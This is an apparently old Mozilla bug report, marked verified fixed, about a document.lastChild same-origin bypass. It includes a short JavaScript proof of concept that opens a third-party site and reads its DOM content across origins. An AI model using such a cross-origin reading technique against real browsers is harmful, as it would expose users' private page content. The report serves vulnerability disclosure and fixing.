document.lastChild vulnerability

VERIFIED FIXED

Status

()

defect
P3
normal
VERIFIED FIXED
20 years ago
20 years ago

People

(Reporter: joro, Assigned: norrisboyd)

Tracking

Trunk
x86
Windows 95
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

()

Reporter

Description

20 years ago
document.lastChild allows access to arbitrary document, which allows at least
reading its content.
This bug is very similar to the document.firstChild bug.
The code is:
-----------------------------------------------------------------
function f(o)
{
 var s='';
 var i;
 s = o.nodeValue;
 if ( o.childNodes )
    for ( i = 0; i < o.childNodes.length; i++ )
       s += f(o.childNodes[i]);
return s;
}

a=window.open("http://www.yahoo.com","victim");

function g()
{
document.forms[0].elements[0].value=f(a.document.lastChild);
}
setTimeout("g()",10000);
---------------------------------------------------
Assignee

Updated

20 years ago
Status: NEW → RESOLVED
Closed: 20 years ago
Resolution: --- → FIXED
Assignee

Comment 1

20 years ago
This is fixed with my Friday night checkin of all.js.

Updated

20 years ago
QA Contact: junruh → dshea

Updated

20 years ago
Status: RESOLVED → VERIFIED

Comment 2

20 years ago
Windows NT 1999120208 Comm
Verified
...'[Exception... "Security error"'...

Comment 3

20 years ago
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in before you can comment on or make changes to this bug.